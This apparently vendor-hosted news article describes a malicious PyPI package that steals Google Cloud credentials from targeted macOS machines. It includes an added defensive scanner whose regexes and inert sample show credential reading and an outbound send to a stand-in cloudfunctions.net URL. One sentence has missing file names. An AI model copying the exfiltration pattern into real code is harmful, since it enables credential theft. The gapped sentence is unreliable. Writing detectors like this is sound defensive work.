Cybersecurity researchers have discovered a malicious package on the Python Package Index (PyPI) repository that targets Apple macOS systems with the goal of stealing users' Google Cloud credentials from a narrow pool of victims. The package, named "lr-utils-lib," attracted a total of 59 downloads before it was taken down. It was uploaded to the registry in early June 2024.
Key Takeaways
Malicious PyPI package named "lr-utils-lib" targets macOS systems.
The package aims to steal Google Cloud credentials.
It was downloaded 59 times before removal.
The malware uses predefined hashes to target specific macOS machines.
Captured credentials are sent to a remote server.
Discovery and Functionality
Checkmarx researcher Yehuda Gelb reported that the malware first checks if it has been installed on a macOS system. It then compares the system's Universally Unique Identifier (UUID) against a hard-coded list of 64 hashes. If the compromised machine is among those specified, it attempts to access two files, namely and , located in the directory, which contain Google Cloud authentication data.
Data Transmission
The captured information is transmitted over HTTP to a remote server "europe-west2-workload-422915[.]cloudfunctions[.]net." This indicates a sophisticated level of planning and execution by the threat actors.
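The behaviour described in the two sections above (a macOS-only gate, a hardware-UUID lookup against a hard-coded digest table, access to gcloud credential storage, and an outbound HTTP call to a cloudfunctions.net host) can be turned into a static triage check for package source files. The following is an added example written for this page, not code from Checkmarx or the original article; the regexes, the digest-count threshold, and the two inert sample fragments are my own assumptions and constructions.

```python
import hashlib
import re

# Static indicators for the pattern the article describes: a macOS-only gate,
# a hardware-UUID lookup, a large table of hex digests used as a target
# allow-list, a reference to gcloud credential storage, and an outbound call
# to a cloudfunctions.net host. The exact patterns are assumptions.
INDICATORS = {
    "macos_gate": re.compile(r"platform\.system\(\)\s*==\s*['\"]Darwin['\"]|sys\.platform\s*==\s*['\"]darwin['\"]"),
    "hardware_uuid": re.compile(r"IOPlatformUUID|IOPlatformExpertDevice"),
    "gcloud_credentials": re.compile(r"gcloud", re.IGNORECASE),
    "cloudfunctions_host": re.compile(r"[\w.-]+\.cloudfunctions\.net"),
}
HEX_DIGEST = re.compile(r"['\"]([0-9a-f]{64})['\"]")
MIN_DIGESTS = 16  # assumption: fewer than this is unlikely to be a target allow-list

def scan_source(text: str) -> dict:
    """Return a dict of indicator name -> bool for one source file's text."""
    hits = {name: bool(rx.search(text)) for name, rx in INDICATORS.items()}
    hits["digest_table"] = len(set(HEX_DIGEST.findall(text))) >= MIN_DIGESTS
    return hits

def risk_score(text: str) -> int:
    """Number of indicators that fired; 4 or more matches the lr-utils-lib shape."""
    return sum(scan_source(text).values())

# Constructed, non-functional setup.py fragment carrying all five indicators.
# The digests are sha256 of labelled strings, not real target hashes, and the
# calls are pseudo-names that do not exist.
_DIGESTS = [hashlib.sha256(f"constructed-target-{i}".encode()).hexdigest() for i in range(64)]
SUSPICIOUS_SAMPLE = f"""
import platform
TARGET_HASHES = {_DIGESTS!r}
if platform.system() == "Darwin":
    uuid = query_ioreg("IOPlatformExpertDevice")        # pseudo-call
    blob = read_credential_store(gcloud_config_dir())   # pseudo-call
    send("https://example-project.cloudfunctions.net/x", blob)
"""

# Constructed benign sample: a platform check alone should not raise an alert.
BENIGN_SAMPLE = """
import platform
if platform.system() == "Darwin":
    EXTRA_LIBS = ["-framework", "CoreFoundation"]
"""

if __name__ == "__main__":
    for name, src in (("suspicious", SUSPICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(name, risk_score(src), scan_source(src))
```

Run it over the setup.py and top-level module of any package you are about to install; a single indicator is normal, a cluster of them is what warrants a manual review.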
Social Engineering Element
Checkmarx also found a fake profile on LinkedIn with the name "Lucid Zenith" that matched the package's owner and falsely claimed to be the CEO of Apex Companies. This suggests a possible social engineering element to the attack.
Previous Incidents
This incident comes more than two months after cybersecurity firm Phylum disclosed details of another supply chain attack involving a Python package called "requests-darwin-lite" that was also found to unleash its malicious actions after checking the UUID of the macOS host. These campaigns indicate that threat actors have prior knowledge of the macOS systems they want to infiltrate and are going to great lengths to ensure that the malicious packages are distributed only to those particular machines.
Impact on Enterprises
"While it is not clear whether this attack targeted individuals or enterprises, these kinds of attacks can significantly impact enterprises," Gelb said. "While the initial compromise usually occurs on an individual developer's machine, the implications for enterprises can be substantial."
The discovery of the "lr-utils-lib" package highlights the ongoing risks associated with supply chain attacks and the need for heightened vigilance among developers and enterprises. As threat actors continue to evolve their tactics, it is crucial to implement robust security measures to protect sensitive information. Learn how the team at Betterworld Technology can help protect you from cyber-threats by booking a consultation with our experts now. Together we can find the best solutions and systems to implement and help your organization run smoothly and efficiently.
Sources
Malicious PyPI Package Targets macOS to Steal Google Cloud Credentials, The Hacker News.